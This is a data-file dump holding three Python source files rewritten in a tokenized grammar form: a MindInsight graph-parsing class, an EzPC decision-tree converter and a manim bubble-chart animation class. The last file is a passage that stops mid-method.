content stringlengths 0 1.55M |
|---|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""This file is used to define the MindSpore graph."""<import_from_stmt>collections defaultdict<import_from_stmt>mindinsight.datavisual.common.log logger<import_from_stmt>mindinsight.datavisual.data_transform.graph.msgraph MSGraph<import_from_stmt>mindinsight.domain.graph.base NodeTypeEnum<class_stmt>OptimizedGraph(MSGraph)<block_start>"""The object describes the MindSpore graph, and it is defined in the anf_ir proto file."""<line_sep>MIN_GROUP_NODE_COUNT=10<def_stmt>__init__ self<block_start>super().__init__()<line_sep>self._load_node_temp_cache={}<block_end><def_stmt>_inherit_input_output_from_subnode self parent_node subnode_list filtered_type=<none><block_start>"""
Adds the input and output of all direct child nodes to the current node.
Args:
parent_node (Node): The nodes that inherit the input and output of the child nodes.
subnode_list (list[Node]): A list of child nodes that are inherited from the input and output.
filtered_type (set(str)): Filter some input and output that do not require inheritance
based on the node type. Default is filter const node.
Note:
- Only the inputs and outputs of the external scope are inherited.
- Before add_const_node method, if the input is a const,
the scope of the const node is not startswith the name of parent node.
So in this scenario, we need to filter the const nodes.
"""<line_sep>filtered_type={NodeTypeEnum.CONST.value}<if>filtered_type<is><none><else>filtered_type<for_stmt>method ['inputs' 'outputs' 'proxy_inputs' 'proxy_outputs']<block_start><for_stmt>node subnode_list<block_start><for_stmt>item_name,item_attr getattr(node method).items()<block_start>target_node=self._get_normal_node(node_name=item_name)<if_stmt>target_node<is><none><block_start>logger.warning("inherit %s from subnode, target node (%s) is None" method item_name)<line_sep><continue><block_end><if_stmt>item_name.startswith(f'{parent_node.name}/')<block_start><continue><block_end><if_stmt>target_node.type<in>filtered_type<block_start><continue><block_end>getattr(parent_node f'add_{method}')(item_name item_attr)<block_end><block_end><block_end><block_end><def_stmt>_cache_node self node<block_start>"""Store the node in the cache."""<line_sep># Notice:
# The additional caching is used to handle the Const, Parameter and LOAD nodes separately later.
super()._cache_node(node)<if_stmt>node.type<eq>NodeTypeEnum.LOAD.value<block_start>self._load_node_temp_cache.update({node.name:node})<block_end><block_end><def_stmt>_delete_nodes_of_cache self node_names<block_start>"""Delete node from cache."""<line_sep>logger.debug("These nodes will be removed from the cache, node names: %s." node_names)<for_stmt>name node_names<block_start><if_stmt>self._parameter_node_temp_cache.get(name)<block_start>self._parameter_node_temp_cache.pop(name)<block_end><if_stmt>self._const_node_temp_cache.get(name)<block_start>self._const_node_temp_cache.pop(name)<block_end><if_stmt>self._load_node_temp_cache.get(name)<block_start>self._load_node_temp_cache.pop(name)<block_end>node=self._get_normal_node(node_name=name)<line_sep>self._normal_node_map.pop(name)<line_sep>self._node_id_map_name.pop(node.node_id)<block_end><block_end><def_stmt>_parse_data self proto_data<block_start>"""
The proto data is parsed and all nodes are stored in the specified structure.
Args:
proto_data (anf_ir_pb2.GraphProto): Refer to anf_ir_pb2.GraphProto object.
"""<line_sep>logger.info("Start to parse graph proto data.")<line_sep>self._parse_op_nodes(proto_data.node)<line_sep>self._parse_parameters(proto_data.parameters)<line_sep>self._parse_consts(proto_data.const_vals)<line_sep>self._update_input_after_create_node()<line_sep>self._update_output_after_create_node()<line_sep>self._delete_non_computational_ops()<line_sep>self._clean_no_input_output_node()<line_sep>self._extract_node_by_single_node_in_scope()<line_sep>logger.info("Parse proto data end, normal node count(only contain op node, "<concat>"parameter, const): %s." self.normal_node_count)<block_end><def_stmt>_parse_op_nodes self node_protos<block_start>"""
Parse `anf_ir_pb2.NodeProto` object, and create a normal node.
Args:
node_protos (list[anf_ir_pb2.NodeProto]): Refer to anf_ir_pb2.NodeProto.
"""<line_sep>logger.debug("Start to parse op nodes from proto.")<for_stmt>topological_index,node_proto enumerate(node_protos)<block_start><if_stmt><not>node_proto.name<block_start>logger.warning("Finding a node with an empty name will not save it.")<line_sep><continue><block_end><if_stmt>node_proto.full_name.startswith("Gradients")<or>"optimizer"<in>node_proto.full_name<or>"opt"<in>node_proto.instance_name<block_start><continue><block_end>self._parse_op_node(topological_index node_proto)<block_end><block_end><def_stmt>_update_input_after_create_node self<block_start>"""Update the input of node after create node."""<for_stmt>node self._normal_node_map.values()<block_start><for_stmt>src_node_id,input_attr dict(node.inputs).items()<block_start>node.delete_inputs(src_node_id)<if_stmt><not>self._is_node_exist(node_id=src_node_id)<block_start><continue><block_end>src_node=self._get_normal_node(node_id=src_node_id)<line_sep>input_attr['shape']=src_node.output_shape<line_sep>input_attr['data_type']=src_node.output_data_type<line_sep>node.add_inputs(src_name=src_node.name input_attr=input_attr)<block_end><block_end>nodes=self._list_nodes_without_parameter_const()<for_stmt>node nodes<block_start><for_stmt>src_node_name,_ dict(node.inputs).items()<block_start><if_stmt><not>self._is_node_exist(node_name=src_node_name)<block_start>logger.warning("Source node (%s) is None." src_node_name)<line_sep><continue><block_end>src_node=self._get_normal_node(node_name=src_node_name)<if_stmt>src_node.type<in>(NodeTypeEnum.LOAD.value NodeTypeEnum.TUPLE_GET_ITEM.value NodeTypeEnum.MAKETUPLE.value NodeTypeEnum.UPDATE_STATE.value)<block_start>node.delete_inputs(src_node_name)<for_stmt>source_node_name,source_attr dict(src_node.inputs).items()<block_start>source_node=self._get_normal_node(node_name=source_node_name)<if_stmt>source_node<is><none><block_start>logger.warning("Source node (%s) is None." 
source_node_name)<line_sep><continue><block_end>source_attr['shape']=source_node.output_shape<line_sep>source_attr['data_type']=source_node.output_data_type<line_sep>node.add_inputs(src_name=source_node.name input_attr=source_attr)<block_end><block_end><block_end><block_end><block_end><def_stmt>_update_output_after_create_node self<block_start>"""Update the output of node after create node."""<line_sep>super()._update_output_after_create_node()<line_sep>nodes=self._list_nodes_without_parameter_const()<for_stmt>node nodes<block_start><for_stmt>src_node_name,_ dict(node.outputs).items()<block_start><if_stmt><not>self._is_node_exist(node_name=src_node_name)<block_start>logger.warning("Source node (%s}) is None." src_node_name)<line_sep><continue><block_end>src_node=self._get_normal_node(node_name=src_node_name)<if_stmt>src_node.type<in>(NodeTypeEnum.LOAD.value NodeTypeEnum.TUPLE_GET_ITEM.value NodeTypeEnum.MAKETUPLE.value NodeTypeEnum.UPDATE_STATE.value)<block_start>node.delete_outputs(src_node_name)<for_stmt>source_node_name,source_attr dict(src_node.outputs).items()<block_start>source_node=self._get_normal_node(node_name=source_node_name)<if_stmt>source_node<is><none><block_start>logger.warning("Source node (%s) is None." 
source_node_name)<line_sep><continue><block_end>source_attr['shape']=source_node.output_shape<line_sep>source_attr['data_type']=source_node.output_data_type<line_sep>node.add_outputs(src_name=source_node.name output_attr=source_attr)<block_end><block_end><block_end><block_end><block_end><def_stmt>_delete_non_computational_ops self<block_start>"""Deleted non-computational operators."""<line_sep>delete_names=[]<for_stmt>node self._normal_node_map.values()<block_start><if_stmt>node.type<in>(NodeTypeEnum.LOAD.value NodeTypeEnum.TUPLE_GET_ITEM.value NodeTypeEnum.MAKETUPLE.value NodeTypeEnum.UPDATE_STATE.value)<block_start>delete_names.append(node.name)<block_end><block_end>self._delete_nodes_of_cache(delete_names)<block_end><def_stmt>_list_nodes_without_parameter_const self<block_start>"""List nodes without parameter and const node."""<line_sep>nodes=self._normal_node_map.values()<line_sep>not_expect_type=(NodeTypeEnum.CONST.value NodeTypeEnum.PARAMETER.value)<line_sep>nodes=filter(<lambda>node:node.type<not><in>not_expect_type nodes)<line_sep>nodes=sorted(nodes key=<lambda>node:node.topological_index)<line_sep><return>nodes<block_end><def_stmt>_extract_node_by_single_node_in_scope self<block_start>"""Extract node from the scope which has only one node."""<line_sep>nodes=self._list_nodes_without_parameter_const()<line_sep>scope_map_types=defaultdict(set)<line_sep>scope_map_node_cnt=defaultdict(int)<for_stmt>node nodes<block_start><if_stmt><not>node.scope<or>'/'<not><in>node.scope<block_start><continue><block_end>scope_map_types[node.scope].add(node.type)<line_sep>scope_map_node_cnt[node.scope]<augadd>1<block_end>filter_scopes=set()<for_stmt>scope,types scope_map_types.items()<block_start><if_stmt>len(types)<eq>1<and>scope_map_node_cnt[scope]<g>1<and>types.pop()<in>scope<block_start>filter_scopes.add(scope)<block_end><block_end><for_stmt>filter_scope list(filter_scopes)<block_start><for_stmt>scope 
scope_map_types<block_start><if_stmt>scope.startswith(f'{filter_scope}/')<block_start>filter_scopes.remove(filter_scope)<line_sep><break><block_end><block_end><block_end><if_stmt><not>filter_scopes<block_start><return><block_end><for_stmt>node nodes<block_start><if_stmt>node.scope<in>filter_scopes<and>'/'<in>node.scope<block_start>name=node.name.rsplit('/' 1)[1]<line_sep>new_scope=node.scope.rsplit('/' 1)[0]<line_sep>new_name=f'{new_scope}/{name}'<line_sep>self._update_node_name_of_cache(node new_name)<block_end><block_end><return><block_end><def_stmt>_clean_no_input_output_node self<block_start>"""Clean nodes which has no input and output."""<line_sep>nodes=self._list_nodes_without_parameter_const()<line_sep>deleted_names=[]<for_stmt>node nodes<block_start><if_stmt><not>node.inputs<and><not>node.outputs<block_start>deleted_names.append(node.name)<block_end><block_end>self._delete_nodes_of_cache(deleted_names)<block_end><block_end> |
"""
Authors: <NAME>, <NAME>.
Copyright:
Copyright (c) 2021 Microsoft Research
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""<line_sep>"""
This python file takes in a graphviz text file,
creates a tree in memory and outputs the tree's
characteristic (feature and threshold at each node)
where it is ASSUMED that initially each node of
the tree is either leaf or it has 2 children.
This file also takes care of adding dummy nodes
to create a new funtionally equivalent complete
binary tree to be used by EzPC code.
"""<import_stmt>math<import_stmt>os<class_stmt>TreeNode(object)<block_start><def_stmt>__init__ self<block_start>self.left=<none><line_sep>self.right=<none><line_sep>self.value=0<line_sep>self.feature=-1<line_sep>self.depth=-1<block_end><block_end><def_stmt>fill_recur ctx features threshold depth<block_start>ctx.max_depth=max(ctx.max_depth depth)<if_stmt>features[ctx.ctr]<eq>-1# Leaf Node
<block_start>node=TreeNode()<line_sep>node.value=threshold[ctx.ctr]<line_sep>node.depth=depth<line_sep>ctx.ctr<augadd>1<line_sep><return>node<block_end><else_stmt><block_start>node=TreeNode()<line_sep>node.value=threshold[ctx.ctr]<line_sep>node.feature=features[ctx.ctr]<line_sep>node.depth=depth<line_sep>ctx.ctr<augadd>1<line_sep>node_left=fill_recur(ctx features threshold depth+1)<line_sep>node_right=fill_recur(ctx features threshold depth+1)<line_sep>node.left=node_left<line_sep>node.right=node_right<line_sep><return>node<block_end><block_end><def_stmt>is_internal node<block_start><if_stmt>node.feature<eq>-1<block_start><return><false><block_end><else_stmt><block_start><return><true><block_end><block_end><def_stmt>get_to_pad_subtree ctx node depth_diff<block_start><if_stmt>depth_diff<eq>1# New leafs
<block_start>node_left=TreeNode()<line_sep>node_right=TreeNode()<line_sep>node_left.value=node.value<line_sep>node_right.value=node.value<line_sep>node_left.depth=ctx.max_depth+1-depth_diff<line_sep>node_right.depth=ctx.max_depth+1-depth_diff<line_sep>node.left=node_left<line_sep>node.right=node_right<line_sep>node.feature=1<line_sep>node.value=0.0<line_sep><return>node<block_end><else_stmt><block_start>node_left=TreeNode()<line_sep>node_right=TreeNode()<line_sep>node_left.value=node.value<line_sep>node_right.value=node.value<line_sep>node_left.feature=node.feature<line_sep>node_right.feature=node.feature<line_sep>node_left.depth=ctx.max_depth+1-depth_diff<line_sep>node_right.depth=ctx.max_depth+1-depth_diff<line_sep>node_left=get_to_pad_subtree(ctx node_left depth_diff-1)<line_sep>node_right=get_to_pad_subtree(ctx node_right depth_diff-1)<line_sep>node.left=node_left<line_sep>node.right=node_right<line_sep>node.feature=1<line_sep>node.value=0.0<line_sep><return>node<block_end><block_end><def_stmt>pad_to_complete_tree ctx node<block_start><if_stmt><not>is_internal(node)# Leaf node
<block_start><if_stmt>node.depth<ne>ctx.max_depth# Needs padding
<block_start>node=get_to_pad_subtree(ctx node ctx.max_depth-node.depth)<block_end><block_end><else_stmt><block_start>pad_to_complete_tree(ctx node.left)<line_sep>pad_to_complete_tree(ctx node.right)<block_end><block_end><def_stmt>dump_complete_tree ctx root<block_start>queue=[root]<line_sep>ctr_local=0<while_stmt>ctr_local<l>ctx.nodes_in_complete_tree<block_start>current_node=queue[ctr_local]<line_sep>ctr_local<augadd>1<if_stmt>is_internal(current_node)<block_start>ctx.ezpc_features.append(current_node.feature)<line_sep>ctx.ezpc_threshold.append(current_node.value)<line_sep>ctx.ezpc_depth.append(current_node.depth)<line_sep>queue.append(current_node.left)<line_sep>queue.append(current_node.right)<block_end><else_stmt><block_start>ctx.ezpc_features.append(-1)<line_sep>ctx.ezpc_threshold.append(current_node.value)<line_sep>ctx.ezpc_depth.append(current_node.depth)<block_end><block_end><block_end><def_stmt>parse_graphviz_to_ezpc_input tree_file_path task scaling_factor<block_start><with_stmt>open(tree_file_path "r")<as>f<block_start>lines=f.readlines()<block_end>lines=lines[1:]<line_sep>depth=0<line_sep>nodes_this_tree=0<line_sep>features=[]<line_sep>threshold=[]<for_stmt>i range(len(lines))<block_start>curline=lines[i]<line_sep># print("processing :", curline)
start_location=curline.find('"')<line_sep>start_location<augadd>1<if_stmt>start_location<eq>0<block_start><break><block_end>nodes_this_tree<augadd>1<if_stmt>curline[start_location]<eq>"X"# This is an internal node
<block_start>end_location_feature=curline.find("]")<line_sep>start_location_th=curline.find("<=")<line_sep>end_location_th=curline.find("\\n")<line_sep>feature_val=int(curline[start_location+2:end_location_feature])<line_sep>threshold_val=float(curline[start_location_th+3:end_location_th])<line_sep>features.append(feature_val)<line_sep>threshold.append(threshold_val)<line_sep># print("Internal Node")
# print(feature_val)
# print(threshold_val)
<block_end><else_stmt># This is a leaf
<block_start>start_location_val=-1<if_stmt>task<eq>"reg"<block_start>start_location_val=curline.find("value =")<block_end><else_stmt><block_start>start_location_val=curline.find("class =")<block_end><assert_stmt>start_location_val<ne>-1 ("Task specified: "+task+" may be incorrect!")<line_sep>end_location_val=curline.find('" filled')<line_sep>output_val=float(curline[start_location_val+7:end_location_val])<line_sep>features.append(-1)<line_sep>threshold.append(output_val)<line_sep># print("Leaf Node")
# print(output_val)
<block_end><block_end><class_stmt>Context(object)<block_start><def_stmt>__init__ self<block_start>self.ctr=0<line_sep>self.ezpc_features=[]<line_sep>self.ezpc_threshold=[]<line_sep>self.ezpc_depth=[]<line_sep>self.max_depth=-1<line_sep>self.nodes_in_complete_tree=-1<block_end><block_end>ctx=Context()<line_sep>root=fill_recur(ctx features threshold 1)<line_sep>ctx.nodes_in_complete_tree=pow(2 ctx.max_depth)-1<line_sep># if nodes_in_complete_tree != nodes_this_tree:
# print("[PADDING] Input tree not complete. Padding to make complete.")
# else:
# print("Input tree already complete. No need to pad.")
pad_to_complete_tree(ctx root)<line_sep>dump_complete_tree(ctx root)<line_sep>model_weights="weight_sf_"+str(scaling_factor)+".inp"<line_sep>ezpc_tree_path=os.path.join(os.path.dirname(tree_file_path) model_weights)<line_sep># print("Writing to " + ezpc_tree_path)
# print("[FLOAT TO FIXED] Scaling by 2^" + str(scaling_factor) + " times")
<with_stmt>open(ezpc_tree_path "a")<as>output_file<block_start><for_stmt>i range(len(ctx.ezpc_features))<block_start>output_file.write(str(ctx.ezpc_features[i])+"\n")<block_end><for_stmt>i range(len(ctx.ezpc_threshold))<block_start>output_file.write(str(int(math.floor((2<power>scaling_factor)<times>ctx.ezpc_threshold[i])))+"\n")<block_end><block_end><return>ctx.max_depth<block_end> |
<import_from_stmt>manimlib.imports *<import_from_stmt>Danim.BubbleChart.BCutils *<import_from_stmt>Danim.BubbleChart.bubble_constants *<class_stmt>BubbleChart(VGroup)# A class to quickly create the bubble chart animation
# may not have the freedom to change things
<block_start>CONFIG={"show_axes_lable":SHOW_AXIS_LABLES #default True
"show_time_lable":<true> # names to show are stored in SHOWN_ENTITY_NAMES
"show_color_lables":<true> # default group names
"set_bubble_colors":"randomly" # two options: "by_group" or "randomly"
"x_axis_lable":X_AXIS_LABLE "y_axis_lable":Y_AXIS_LABLE "show_creation":<false>}<def_stmt>__init__ self X Y R entity_names T **kwargs#CONFIG to attributes
<block_start>digest_config(self kwargs)<line_sep>self.entity_names=entity_names<line_sep>self.times=T<line_sep>#create axes
(self.axes_config self.axes)=import_data_and_set_axes(X Y)<line_sep>#transform X,Y,R into screen coordinates
self.coordinates,self.radiusdata=transform_from_data_to_screencoordinates(X Y R self.axes)<line_sep>#set the colors of bubbles:
#COLORMAT is a list of shape(num_of_bubbles,1)
#each element is a color array
self.COLORMAT=self.generate_colormatrix()<if_stmt><not>self.show_creation#set the bubble to the start time
<block_start>self.bubbles=set_up_the_bubbles(self.coordinates[: 0] self.radiusdata[: 0] self.axes color_mat=self.COLORMAT)<line_sep>#create lables
self.lables_creation()<line_sep>VGroup.__init__(self **kwargs)<line_sep>self.add(self.axes self.bubbles self.lables)<block_end><else_stmt><block_start>self.lables_creation()<line_sep>VGroup.__init__(self **kwargs)<line_sep>self.add(self.axes self.lables)<line_sep>#the bubbles and will be created later
#using animation method self.Get_Creation_Animation(directly_show_creation = False)
<block_end><block_end><def_stmt>get_current_timeindex self<block_start><return>self.times.index(self.time_lable.get_tex_string())<block_end><def_stmt>generate_colormatrix self colors=<none># the color of each bubbles can be set by some group lables
# for example: if each bubble represents a contry, then
# you can set all the contry in Asia as red bubbles,
# North American Contries as blue bubbles
# you need a cvs file called the "Group_lable.csv" to store each tags
# or you can just put a dic to represents that relationship
<block_start><if_stmt>self.set_bubble_colors<eq>"by_group"#generate color matrices with default color red
<block_start>COLORMAT=[RED]<times>self.coordinates.shape[0]<line_sep>#read information from "Group_lable.csv"
group_lable_data=np.array(pd.DataFrame(pd.read_csv(GROUP_LABLE_CSV_FILE encoding="gbk" index_col=0) index=self.entity_names))<line_sep>#check whether the numbers of rows are the same
<assert_stmt>(len(COLORMAT)<eq>group_lable_data.shape[0])<line_sep>self.group_index=[]<line_sep>#match color to COLORMAT with relationship in COLOR_LABLE_DICT
<for_stmt>i,lable enumerate(group_lable_data)<block_start><if_stmt>lable[0]<in>COLOR_LABLE_DICT<block_start>COLORMAT[i]=COLOR_LABLE_DICT[lable[0]]<line_sep>self.group_index.append(COLOR_LABLE_INDEX_DICT[lable[0]])<block_end><block_end><block_end>#generate color randomly
<elif_stmt>self.set_bubble_colors<eq>"randomly"<block_start>COLORMAT=[]<for_stmt>i range(0 self.coordinates.shape[0]+1)<block_start>COLORMAT.append(random_color())<block_end><block_end><else_stmt><block_start>COLORMAT=[RED<times>self.coordinates.shape[0]]<block_end><return>COLORMAT<block_end><def_stmt>lables_creation self#lable creation:
<block_start>self.lables=VGroup()<if_stmt>self.show_axes_lable#Create the x_axis_lable
<block_start>self.lables.add((TextMobject(self.x_axis_lable color=TEXT_COLOR).scale(TEXT_SCALE_FACTOR)).shift(self.axes.x_axis.number_to_point(self.axes.x_axis.x_max)+X_LABLE_ADJUST_VECTOR))<line_sep>#create the y_axis_lable:
self.lables.add((TextMobject(self.y_axis_lable color=TEXT_COLOR).scale(TEXT_SCALE_FACTOR)).shift(self.axes.y_axis.number_to_point(self.axes.y_axis.x_max)+Y_LABLE_ADJUST_VECTOR))<block_end>#create the time lable
<if_stmt>self.show_time_lable<block_start>self.time_lable=(TextMobject(str(self.times[0]) color=TIME_LABLE_COLOR).scale(TIME_LABLE_SCALE_FACTOR)).shift(TIME_LABLE_POSITION)<line_sep>#self.lables.add(self.time_lable)
<block_end>#create color lables(with rectangles)
<if_stmt>self.show_color_lables<and>(<not>self.show_creation)<block_start>entity_color_map=dict(dict(zip(self.entity_names self.COLORMAT)) **COLOR_LABLE_DICT)<line_sep>self.color_lables=VGroup()<for_stmt>i,entity enumerate(SHOWN_ENTITY_NAMES)<block_start><if_stmt>entity<in>entity_color_map<block_start>rect=Rectangle(height=RECT_HIGHT width=RECT_WIDTH color=entity_color_map[entity] fill_opacity=1)<if_stmt>SHOW_CN_NAMES<block_start>name_to_show=online_translation(entity)<line_sep>rect_name=TextMobject(name_to_show).scale(RECT_TEXT_SCALE_FACTOR)<block_end><else_stmt><block_start>rect_name=TextMobject(entity).scale(RECT_TEXT_SCALE_FACTOR)<block_end><if_stmt>i<eq>0<block_start>rect.shift(RECT_POSITION)<line_sep>rect_name.next_to(rect RIGHT)<block_end><else_stmt><block_start>rect.align_to(self.color_lables direction=LEFT+DOWN)<line_sep>rect.shift(DOWN<times>RECT_HIGHT<times>RECT_INTERVAL_FACTOR)<line_sep>rect_name.next_to(rect RIGHT)<block_end>self.color_lables.add(rect rect_name)<block_end><block_end>self.lables.add(self.color_lables)<block_end><block_end><def_stmt>Get_Creation_Animation self directly_show_creation=<true> maximum_circles_to_show=50 creation_time_index=0 initial_position=3<times>UP+3<times>RIGHT<block_start>creation_time=self.times[creation_time_index]<line_sep>#Show Creation all together
<if_stmt>directly_show_creation<block_start>self.lables_creation()<line_sep>#self.add(self.lables)
<return>ShowCreation(self run_time=CREATION_RUN_TIME)<block_end>#Show creaton with all name listed
<else_stmt><block_start>self.color_lables=VGroup()<line_sep>old_bubbles=[]<line_sep>transfered_bubbles=[]<line_sep>name_lables=[]<line_sep>self.circle_index=[]<line_sep>self.bubbles=VGroup()<line_sep>self.grow_animation=[]<line_sep>self.transfer_animation=[]<line_sep>self.color_lables_animation=[]<def_stmt>generate_circle_matrix indices#indices is the relative index
#position in self.entity_names
<block_start>new_entity=[]<line_sep>y0=self.axes.x_axis.number_to_point(self.axes.x_axis.x_max)[1]<for_stmt>i,name enumerate(self.entity_names)<block_start><if_stmt>i<in>indices<block_start>new_entity.append(name)<block_end><block_end><if_stmt><not>len(old_bubbles)<eq>0<block_start>start_index=len(old_bubbles)<block_end><else_stmt><block_start>start_index=0<block_end><for_stmt>j,name enumerate(new_entity)#old_bubble creation
<block_start><if_stmt>j<eq>0<block_start>previous_index=start_index<line_sep>cornor_index=start_index<line_sep>old_bubbles.append(set_up_the_bubbles(initial_position self.radiusdata[indices[j] creation_time_index] self.axes self.COLORMAT[indices[j]] mode='single'))<block_end><else_stmt><block_start>old_bubbles.append(set_up_the_bubbles(np.array([0 0 0]) self.radiusdata[indices[j] creation_time_index] self.axes self.COLORMAT[indices[j]] mode='single'))<block_end>#name_lable creation
<if_stmt>SHOW_CN_NAMES<block_start>name_shown=online_translation(name)<block_end><else_stmt><block_start>name_shown=name<block_end>name_lables.append(TextMobject(name_shown).scale(NAME_TEXT_SCALE_FACTOR))<line_sep>name_lables[-1].next_to(old_bubbles[-1] RIGHT)<line_sep>#check if circle matrix reaches the bottom
height=old_bubbles[-1].get_critical_point(UP)[1]-old_bubbles[-1].get_critical_point(DOWN)[1]<line_sep>cell=old_bubbles[previous_index].get_critical_point(DOWN)[1]<if_stmt><not>j<eq>0<block_start>current_VGroup=VGroup(old_bubbles[-1] name_lables[-1])<line_sep># if the curreny circle touches the bottom:
<if_stmt>cell-height<l>y0+0.5<block_start>current_VGroup.next_to(old_bubbles[cornor_index] LEFT)<line_sep>current_VGroup.shift(0.25<times>LEFT)<line_sep>cornor_index=len(old_bubbles)-1<block_end># if the curreny circle does not touch the bottom:
<else_stmt><block_start>current_VGroup.next_to(previous_VGroup DOWN)<block_end><block_end>#transfered_bubbles creation:
transfered_bubbles.append(set_up_the_bubbles(self.coordinates[indices[j] creation_time_index] self.radiusdata[indices[j] creation_time_index] self.axes self.COLORMAT[indices[j]] mode='single'))<line_sep>#record the circle index
self.circle_index.append(indices[j])<line_sep>#append the animation
self.grow_animation.append(AnimationGroup(FadeIn(old_bubbles[-1]) Write(name_lables[-1]) run_time=SINGLE_GROW_RUN_TIME))<line_sep>self.transfer_animation.append(AnimationGroup(ReplacementTransform(old_bubbles[-1] transfered_bubbles[-1]) FadeOut(name_lables[-1]) run_time=SINGLE_TRANSFER_TIME))<line_sep>previous_index=len(old_bubbles)-1<line_sep>previous_VGroup=VGroup(old_bubbles[-1] name_lables[-1])<block_end><block_end><if_stmt>self.set_bubble_colors<eq>"randomly"<block_start>indices=[]<for_stmt>i,name enumerate(self.entity_names)<block_start>indices.append(i)<block_end>quotient=len(self.entity_names)<floordiv>maximum_circles_to_show<line_sep>remainder=len(self.entity_names)%maximum_circles_to_show<for_stmt>i range(quotient)<block_start>generate_circle_matrix(indices[maximum_circles_to_show<times>(i):maximum_circles_to_show<times>(i+1)])<block_end>#generate_circle_matrix(indices[maximum_circles_to_show*(i+1):len(self.entity_names)])
self.bubbles=VGroup(*transfered_bubbles)<block_end>#if set bubbles by group
#usurally with self.show_color_lables = True:
<else_stmt><block_start><if_stmt>self.show_color_lables<block_start>entity_color_map=dict(dict(zip(self.entity_names self.COLORMAT)) **COLOR_LABLE_DICT)<block_end>self.indices=[]<for_stmt>i,entity enumerate(SHOWN_ENTITY_NAMES)<block_start><if_stmt>entity<in>entity_color_map<block_start>rect=Rectangle(height=RECT_HIGHT width=RECT_WIDTH color=entity_color_map[entity] fill_opacity=1)<if_stmt>SHOW_CN_NAMES<block_start>name_to_show=online_translation(entity)<line_sep>rect_name=TextMobject(name_to_show).scale(RECT_TEXT_SCALE_FACTOR)<block_end><else_stmt><block_start>rect_name=TextMobject(entity).scale(RECT_TEXT_SCALE_FACTOR)<block_end><if_stmt>i<eq>0<block_start>rect.shift(RECT_POSITION)<line_sep>rect_name.next_to(rect RIGHT)<block_end><else_stmt><block_start>rect.align_to(self.color_lables direction=LEFT+DOWN)<line_sep>rect.shift(DOWN<times>RECT_HIGHT<times>RECT_INTERVAL_FACTOR)<line_sep>rect_name.next_to(rect RIGHT)<block_end>self.color_lables_animation.append(AnimationGroup(FadeIn(rect) Write(rect_name)))<line_sep>self.color_lables.add(rect rect_name)<line_sep>indice=[]<for_stmt>j,name enumerate(self.entity_names)<block_start><if_stmt>self.COLORMAT[j]<eq>COLOR_LABLE_DICT[entity]<block_start>indice.append(j)<block_end><block_end>generate_circle_matrix(indice)<line_sep>self.indices.append(indice)<block_end><block_end><def_stmt>sort_by_index listA index_list<block_start><assert_stmt>(len(listA)<eq>len(index_list))<line_sep>new_list=[]<for_stmt>z,element enumerate(listA)<block_start>new_list.append(listA[index_list[z]])<block_end><return>new_list<block_end>index_list=[]<for_stmt>indice self.indices<block_start>index_list=index_list+indice<block_end>new_bubbles=sort_by_index(transfered_bubbles index_list)<line_sep>#self.bubbles = VGroup()
<for_stmt>bubble new_bubbles<block_start>self.bubbles.add(bubble)<block_end><block_end>#self.lables.add(self.color_lables)
self.add(self.bubbles)<line_sep>#sort the animation by data index
#originally theanimation list is sort by creation order
<block_end><block_end><def_stmt>Get_Hightlight_Animation self names_to_show #list of str, must be elements in self.entity_names
wait_time=<none> #a number or list of numbers, lens must match the number of entities
intersection_wait_time=1 directions=<none> #directions is a list of direction vectors,
#lens must match the number of entities,
#if none, lables will choose
lable_sizes=<none> #lable_sizes is a list of numbers indicating the size of each lable
#lens must match the number of entities to show
wiggle_time=<none> wiggle_factor=<none> fadeout_time=<none> current_time_index=0 fadeout_at_once=<false>#
<block_start><if_stmt>isinstance(names_to_show list)<block_start>numbers_of_entities=len(names_to_show)<block_end><else_stmt><block_start>numbers_of_entities=1<block_end><if_stmt>directions<is><none><block_start>directions=[UP]<times>numbers_of_entities<block_end><if_stmt>wiggle_factor<is><none><block_start>wiggle_factor=[1.5]<times>numbers_of_entities<block_end><if_stmt>wiggle_time<is><none><block_start>wiggle_time=[1.5]<times>numbers_of_entities<block_end><if_stmt>lable_sizes<is><none><block_start>lable_sizes=[0.7]<times>numbers_of_entities<block_end><if_stmt>fadeout_time<is><none><block_start>fadeout_time=[1]<times>numbers_of_entities<block_end><if_stmt>wait_time<is><none><block_start>wait_time=[1]<times>numbers_of_entities<block_end>old_lables=[]<line_sep>new_lables=[]<line_sep>indices=[]<line_sep>animation=[]<line_sep>#TODO: add empty animation more efficiently
#Currently I add empty animation the dumb way!
#add a black dot outside the screen!
#I don't know how to add empty
